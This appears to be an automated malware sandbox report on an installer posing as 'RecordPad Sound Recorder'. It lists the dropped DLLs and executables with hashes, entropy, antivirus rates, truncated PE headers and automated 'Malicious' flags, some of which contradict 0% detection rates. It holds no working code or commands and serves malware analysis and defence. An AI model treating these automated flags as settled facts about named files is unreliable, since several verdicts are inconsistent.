                                                                                    SHA-512:666B16FF72CB847B8D141B0110BBB45AAE67D9BB01E2D6B48C7BDA61C5DC3126CCBC72627C1B93EC23B87E9427C39DC890F1E0A72E5077DC0071E5FEA1B1E3A3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................7!.....;.....9...............>.;...Vh-.......>.......>.:....=...>.8...Rich....................PE..d.....%Y.........." .........d.......................................................L....`.........................................@........................P...7...l..h!......8.......................................p............ ...............................text...K........................... ..`.rdata....... ......................@..@.data...@....@.......(..............@....pdata...7...P...8...*..............@..@.rsrc................b..............@..@.reloc..8............h..............@..B........................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-VDBC5.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):397672
                                                                                    Entropy (8bit):6.4894894939696846
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:W8c9NNNNNNBgjcQFg7jaV95D3+wxech2KJ:tc9NNNNNN+jcQg7jMnD/xech2o
                                                                                    MD5:B9F3C911728B17FE49BB217D799FCC1A
                                                                                    SHA1:26F4A963E2F43F46323D8610FEC5E8CC8C4A8A16
                                                                                    SHA-256:9CEB41F04B48CF7B419C95D03E227F593836D74A04625C0AD5AD2877D7229B65
                                                                                    SHA-512:0A50270432E6E476D5B4DAF7D9D45053F821BEF02F1872EF598A9E66B2E6B75AE4A89AB97AE175C5143CE3C993D7A354F6389EB5A8BDDBFDE59522103535C403
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.{.%.{.%.{.%.*=%.{.%.*?%.{.%.*.%.{.%.*.%.{.%...%.{.%`.+%.{.%.{.%.{.%..<%.{.%.);%.{.%.{w%.{.%..>%.{.%Rich.{.%........................PE..d......].........." .....8..........................................................g,....`.........................................@...87..x...<.... ...........%......h!...........................................k..p............P...............................text...;6.......8.................. ..`.rdata.......P.......<..............@..@.data...............................@....pdata...%.......&..................@..@_RDATA..P/.......0..................@..@.rsrc........ ......................@..@.reloc..............................@..B................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\libcurl.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):363880
                                                                                    Entropy (8bit):6.3947346615222305
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:lieS4N0DdxBa72yNQuqped6c7Bv5ebr+U2pyQqsa3a8g+QTW:UeSyCVaiyNQAd6cV5K+Jp37W
                                                                                    MD5:460B0576549FFD1F55D717BA6E265A05
                                                                                    SHA1:65AB7E2109658102678C122D7DE603E64DCE7CC5
                                                                                    SHA-256:AAB56C21B6CEC7065882A750BECB4526B4CB5815A4AC002C2594F84FB0F5955F
                                                                                    SHA-512:666B16FF72CB847B8D141B0110BBB45AAE67D9BB01E2D6B48C7BDA61C5DC3126CCBC72627C1B93EC23B87E9427C39DC890F1E0A72E5077DC0071E5FEA1B1E3A3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................7!.....;.....9...............>.;...Vh-.......>.......>.:....=...>.8...Rich....................PE..d.....%Y.........." .........d.......................................................L....`.........................................@........................P...7...l..h!......8.......................................p............ ...............................text...K........................... ..`.rdata....... ......................@..@.data...@....@.......(..............@....pdata...7...P...8...*..............@..@.rsrc................b..............@..@.reloc..8............h..............@..B........................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\libeay32.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2042352
                                                                                    Entropy (8bit):7.085275197144553
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:OFZD9URlmDrgBrhEci8XhP3YLd44RS6+FNbqUzUxVvqKGTZnIzudBDFPjQAr10Fu:+ZeLrXFcL0YF7pvtHkfH
                                                                                    MD5:876A839023B8F962A72D295DA7495734
                                                                                    SHA1:62A7728679BC18784B1FBF1D013F7CECE18CBEC9
                                                                                    SHA-256:A757D773DA406411FB977761F6E56F016D48D224AEDAF3D875ED4D4A9EDE6158
                                                                                    SHA-512:E1B23A2F5EC0100FF874CA075BBD0F90E9065A90FEC66861F99DF603D7AAA9DB8E8EC326710FDC11AD41D01BEFE4EA3077136127ACF613614D0D12FF23BEC6C1
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^............................4.............@..........................@.......................................................p...3..............X............................................................................................text............................... ..`.rdata..x%.......0..................@..@.data....S.......0..................@....rsrc....@...p...@...@..............@..@.vcp1208............................a.G.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\libmp3lame.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):397672
                                                                                    Entropy (8bit):6.4894894939696846
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:W8c9NNNNNNBgjcQFg7jaV95D3+wxech2KJ:tc9NNNNNN+jcQg7jMnD/xech2o
                                                                                    MD5:B9F3C911728B17FE49BB217D799FCC1A
                                                                                    SHA1:26F4A963E2F43F46323D8610FEC5E8CC8C4A8A16
                                                                                    SHA-256:9CEB41F04B48CF7B419C95D03E227F593836D74A04625C0AD5AD2877D7229B65
                                                                                    SHA-512:0A50270432E6E476D5B4DAF7D9D45053F821BEF02F1872EF598A9E66B2E6B75AE4A89AB97AE175C5143CE3C993D7A354F6389EB5A8BDDBFDE59522103535C403
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.{.%.{.%.{.%.*=%.{.%.*?%.{.%.*.%.{.%.*.%.{.%...%.{.%`.+%.{.%.{.%.{.%..<%.{.%.);%.{.%.{w%.{.%..>%.{.%Rich.{.%........................PE..d......].........." .....8..........................................................g,....`.........................................@...87..x...<.... ...........%......h!...........................................k..p............P...............................text...;6.......8.................. ..`.rdata.......P.......<..............@..@.data...............................@....pdata...%.......&..................@..@_RDATA..P/.......0..................@..@.rsrc........ ......................@..@.reloc..............................@..B................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\mousehelper.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):20840
                                                                                    Entropy (8bit):6.3244920295043645
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:rk3cFbdBtZHvagGFsGfZyGmGovy8ZpHEi+:rk0vHy9oyiRM
                                                                                    MD5:D2BC90D6AF120A0643AD5DC5F3CE8D43
                                                                                    SHA1:419C3246B08125754CCBB4323DD823F8DA0548CB
                                                                                    SHA-256:BDED78571A2E60B3324AB9B4D3DDB6DE12FC08CB4BBE6A582A2C2292AA17CCE6
                                                                                    SHA-512:F34C90E44F473A8CD62B75B6D531FDD47AD132A3F1BCE7AD5C0DDF30C61A2454BA214AA2B6CD50C2A1B6CD3AC85F2D9989775376A400D34EBBD2EFAB0FBECC7A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ovA{+./(+./(+./("o.(/./(yb.))./(yb*)%./(yb+)#./(yb,)(./(?|.)../(+..(../(.b*)*./(.b/)*./(.b.(*./(.b-)*./(Rich+./(........................PE..d....z{c.........." ......... .......................................................7....`..........................................8..t...T;..x....p.......`.......0..h!......<....1...............................2..8............0..(............................text............................... ..`.rdata.......0......................@..@.data........P.......(..............@....pdata.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc..<...........................@..B........................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp120.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):660128
                                                                                    Entropy (8bit):6.339798513733826
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:N2fus43uu43Ry4GHlT4xH2K+M+/i+WSpY+7YOzCaK9A3gS2EKZm+GWodEEwnyh:muJzCaK9AB2EKZm+GWodEEwnyh
                                                                                    MD5:46060C35F697281BC5E7337AEE3722B1
                                                                                    SHA1:D0164C041707F297A73ABB9EA854111953E99CF1
                                                                                    SHA-256:2ABF0AAB5A3C5AE9424B64E9D19D9D6D4AEBC67814D7E92E4927B9798FEF2848
                                                                                    SHA-512:2CF2ED4D45C79A6E6CEBFA3D332710A97F5CF0251DC194EEC8C54EA0CB85762FD19822610021CCD6A6904E80AFAE1590A83AF1FA45152F28CA56D862A3473F0A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;..h..h..h..[h..h..h..h..Mh..hIAWh..h..Oh..h..qh..h..ph..h..uh..h..Lh..h..Kh..h..Nh..hRich..h................PE..d.....OR.........." .....@...................................................`......a.....`.........................................pU.. ....2..<....@...........G.......>...P.......X..................................p............P...............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data........P...8...B..............@....pdata...G.......H...z..............@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):590632
                                                                                    Entropy (8bit):6.463330275333709
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Mt8MRN4gE4x4iTqwTQa6IUqXF7XyxpypsdUDqNSfbQEKZm+jWodEEV3Ho/:MCMm9pyp35bQEKZm+jWodEExg
                                                                                    MD5:E74CAF5D94AA08D046A44ED6ED84A3C5
                                                                                    SHA1:ED9F696FA0902A7C16B257DA9B22FB605B72B12E
                                                                                    SHA-256:3DEDEF76C87DB736C005D06A8E0D084204B836AF361A6BD2EE4651D9C45675E8
                                                                                    SHA-512:D3128587BC8D62E4D53F8B5F95EB687BC117A6D5678C08DC6B59B72EA9178A7FD6AE8FAA9094D21977C406739D6C38A440134C1C1F6F9A44809E80D162723254
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*...*...*.....w.(...#...<...*......./.....".................+.....g.+.....+...Rich*...................PE..d...R8.^.........." .....>..........p"....................................................`A........................................ m..h....G..,...............(;......(A......4.......T...............................0............P......Ti..@....................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data....:...`..."...P..............@....pdata..(;.......<...r..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcp140_1.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):31528
                                                                                    Entropy (8bit):6.472533190412445
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:R77JqjlI8icUYWhN5tWcS5gWZoMUekWi9pBj0HRN7RA5aWixHRN7osDhzlGs6N+E:R5D8icUlX5YYMLAWRAlypmPB
                                                                                    MD5:7EE2B93A97485E6222C393BFA653926B
                                                                                    SHA1:F4779CBFF235D21C386DA7276021F136CA233320
                                                                                    SHA-256:BD57D8EEF0BC3A757C5CE5F486A547C79E12482AC8E694C47A6AB794AA745F1F
                                                                                    SHA-512:4A4A3F56674B54683C88BD696AB5D02750E9A61F3089274FAA25E16A858805958E8BE1C391A257E73D889B1EEA30C173D0296509221D68A492A488D725C2B101
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..\4~.\4~.\4~...^4~.UL..X4~.Dz.[4~.D}.^4~.\4..v4~.D..Y4~.D{.O4~.D~.]4~.D..]4~.D|.]4~.Rich\4~.........PE..d...W8.^.........." .........$............................................................`A.........................................>..L....?..x....p.......`..4....:..(A......p...@3..T............................3..0............0..0............................text...(........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..4....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\msvcr120.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):963232
                                                                                    Entropy (8bit):6.634408584960502
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:FkZ+EUPoH5KTcAxt/qvRQdxQxO61kCS9mmWymzVPD:FkMAlM8ixQI5C6wl
                                                                                    MD5:9C861C079DD81762B6C54E37597B7712
                                                                                    SHA1:62CB65A1D79E2C5ADA0C7BFC04C18693567C90D0
                                                                                    SHA-256:AD32240BB1DE55C3F5FCAC8789F583A17057F9D14914C538C2A7A5AD346B341C
                                                                                    SHA-512:3AA770D6FBA8590FDCF5D263CB2B3D2FAE859E29D31AD482FBFBD700BCD602A013AC2568475999EF9FB06AE666D203D97F42181EC7344CBA023A8534FB13ACB7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ck.."..".."..D...".."..-"...s..$ ...s.."...s.."...s.. "...s.."...s.."...s.."..Rich."..........................PE..d.....OR.........." .....h...:.......)..............................................].....`.................................................@...(............@...s...t...>......8...p................................2..p............................................text....g.......h.................. ..`.rdata...8.......:...l..............@..@.data...hu.......D..................@....pdata...s...@...t..................@..@.rsrc................^..............@..@.reloc..8............b..............@..B........................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\openh264.dll (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):869224
                                                                                    Entropy (8bit):6.632387605957213
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:DJf34ppw4hjg401r+iTy2mmzuF3SJciti0ZIj8UoJwCR:Dl3ypw4yN/RiF3SJdO8xJv
                                                                                    MD5:DAA904CE63B0A290111AED5E843B9368
                                                                                    SHA1:6642AD5C2622D756EB3500E7C0420E9DA7A16BB1
                                                                                    SHA-256:471BBC3FA0A98869F6791E0D1A55B38F5E360842A7CC219A6FF26030E62DBB1B
                                                                                    SHA-512:CBFD06523F1855AAF4BE2D33EB3A3A324C8D7AF4871B314AC2C165FD17F8DA6CD2F465E9405412282AAC1ED247B811A4A73D91069A324A5AEC531253AE3A4D0B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.9d0.W70.W70.W7...73.W70.V7m.W7.M.71.W7v..7..W7v..7..W7v..7$.W7.s.7e.W70.W7'.W7.s.71.W7=..71.W7.s.71.W7Rich0.W7........PE..d......].........." .....8...........\...............................................$....`.................................................|...(....`..........x]..."..h!...p.......R..8...............................p............P..H............................text...7+.......,.................. ..`.rodata......@.......0.............. ..`.rdata..FP...P...R...<..............@..@.data... K.......&..................@....pdata..x].......^..................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\openh264_license.txt (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1297
                                                                                    Entropy (8bit):5.115489615345492
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:CbUneZXof9+bOOrXqFT09+JYrXqFTzl796432s4EOkUs8QROJ32s3yxsITf+3t1e:Cn3OOrXqJ07rXqJzr6432sv832s3EsI/
                                                                                    MD5:AAF4009F5963B1B270D8C3E697EBE442
                                                                                    SHA1:F5A44235094DA0B8B5992C6112CB8C356EF22B93
                                                                                    SHA-256:3988CDCCB878675B4AB8C11F21EF7F6301451F59E2E2BF3F07E963D36C8E9767
                                                                                    SHA-512:BC30F4C5F17E4F0CDE2CDD5C36A6EC28271569E18808E736186D42409564E3E6FFA8AD23842912C90F39CE6264A698714A434092778C74CBDE6C330DD3969109
                                                                                    Malicious:false
                                                                                    Preview:Copyright (c) 2013, Cisco Systems.All rights reserved...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:..* Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...* Redistributions in binary form must reproduce the above copyright notice, this. list of conditions and the following disclaimer in the documentation and/or. other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR.ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERV

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\proportions.txt (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):51
                                                                                    Entropy (8bit):3.48286657951254
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:cUoytoUD6MBomFUT:cUoQoUD6Qoyy
                                                                                    MD5:034D89CD2C41EDFCEADA9F96A3C0A56A
                                                                                    SHA1:92AB4E6FF98CA987D56EA3C1BA36D1C61EF23ACB
                                                                                    SHA-256:44BBE94D481B106F00223DD406D015AEFD00CFA2DBA9428BEFC2B8F6A3FEB971
                                                                                    SHA-512:6C3E701D2D0FD24FDB46C0E1B0EF5245F36E4A34A9D2340665A31F6331C2D6F08680399600FB02C3D51694F9BAFFB3E41A367CB4FE945D4836B669DA63EB6358
                                                                                    Malicious:false
                                                                                    Preview:1 1..4 3..3 2..16 9..6 5..468 60..728 90..2592 1936

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:modified
                                                                                    Size (bytes):2963553
                                                                                    Entropy (8bit):6.7944113831776685
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:v5F8VSyAJvaA5z8wbu33Lti5WGzndHKX5HCn:v5F8bAJyez8P33LtiEGzndHKX5w
                                                                                    MD5:1F7ED6F21708581170C4BF77C64A9D32
                                                                                    SHA1:B954FBF7C8A8523B7F2C101E6A7B1D852D1DBF7C
                                                                                    SHA-256:180FCC0CB50242D15ECF0DDD438C14E04A6A7B464BF0636E79620DB497A08DF7
                                                                                    SHA-512:2F62E6B4668E122C5768438E96062DFEE16E13829967F592C92DF93240908B4A09C84BBF96B6F5FBBEC2445E13FE828A0149887673A2C66E4812D0184FB9E28B
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..........&...............................@..........................`-.........................................................@............................................................................................................text............................... ..`.bhead8.n*.......0..................@..@.data...xT...0...@...0..............@....rsrc................p..............@..@.chead8.........a...................a.f.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\unins000.dat

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:InnoSetup Log RecordPad Sound Recorder, version 0x30, 5453 bytes, 123716\user, "C:\Users\user\AppData\Local\RecordPad Sound Recorder"
                                                                                    Category:dropped
                                                                                    Size (bytes):5453
                                                                                    Entropy (8bit):4.791987156187057
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:aH2HoJUdWL4888pgU+95+eOIhfhlEo4cVSQs0LML4gJywwQwbOw6wcnCRS6pc2Bz:aH2HoJUdWL48XpgsHIhfjEdcVSQ1ML4n
                                                                                    MD5:05CFC207A915D3BEFB9E2FFD5BC70259
                                                                                    SHA1:DB6F6599D41B619419A9EE17A80CF419E162607C
                                                                                    SHA-256:6C304B48096E49444AE1A2E09A3598577460388492E19B38E83A142F2D1DBEA7
                                                                                    SHA-512:9321DABC2CD59A6A7397B22AF232DB033DB2E0D46F7C0FBF4EF07166EF004DFF7CEBB7D0E6C4A18161C77C00BB7B7C220726D83B1873794A4DC051A6890ADB44
                                                                                    Malicious:false
                                                                                    Preview:Inno Setup Uninstall Log (b)....................................RecordPad Sound Recorder........................................................................................................RecordPad Sound Recorder........................................................................................................0.......M...%.................................................................................................................S........../........W....123716.user6C:\Users\user\AppData\Local\RecordPad Sound Recorder...........).6.... .....Q......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll

                                                                                    C:\Users\user\AppData\Local\RecordPad Sound Recorder\unins000.exe (copy)

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):707354
                                                                                    Entropy (8bit):6.470926417661749
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:D0QfKb7nH5lrPo37AzHTA63I0ihE4UEQrrNtIECORGv95ELAfXExy8z:nfKbT5lrPo37AzHTA63/cfU9IEU953fo
                                                                                    MD5:F2E1861AB7EFD6358283CF101045A727
                                                                                    SHA1:15F34DC254FE02A84F2F8AD4D5495D7E799F2F9B
                                                                                    SHA-256:35A50C7721675C5422D5F7979912FB1B2BE5811CBBAFBA60FEA36D2DBBC87190
                                                                                    SHA-512:C92F41CEFDEC7305C526F5903509760512F9DC152AFC2969F40B40ACABDAD41CF40273BAC8CEECBA47C4BC0DACDA14D0DA74B8312AFFF37CFADBD8EF8933C685
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................&...........1.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.......*..............@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\tOniaJ21lj.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):696832
                                                                                    Entropy (8bit):6.462782329218102
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:L0QfKb7nH5lrPo37AzHTA63I0ihE4UEQrrNtIECORGv95ELAfXExy8:ffKbT5lrPo37AzHTA63/cfU9IEU953f0
                                                                                    MD5:8EF7001015E126E74BC41268504CA1E2
                                                                                    SHA1:B30C0FA54ECB63C735407144A3297E0B9D881E27
                                                                                    SHA-256:E06E234073AE4A9DF232AA1D535F02429A371748E164606C1B1A4C74BD98C56C
                                                                                    SHA-512:122DF0A13F2D0C3103F0F686863CFAB46114A417C5D6A4382410C2CCF0AA3E9859D8E760B5C1860C776B1064F5BCCBF1E8AA50108F948F9240A5DD80D31CF17B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................&...........1.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.......*..............@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_RegDLL.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4096
                                                                                    Entropy (8bit):4.026670007889822
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                    MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                    SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                    SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                    SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\is-NO26A.tmp\_isetup\_iscrypt.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2560
                                                                                    Entropy (8bit):2.8818118453929262
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                    MD5:A69559718AB506675E907FE49DEB71E9
                                                                                    SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                    SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
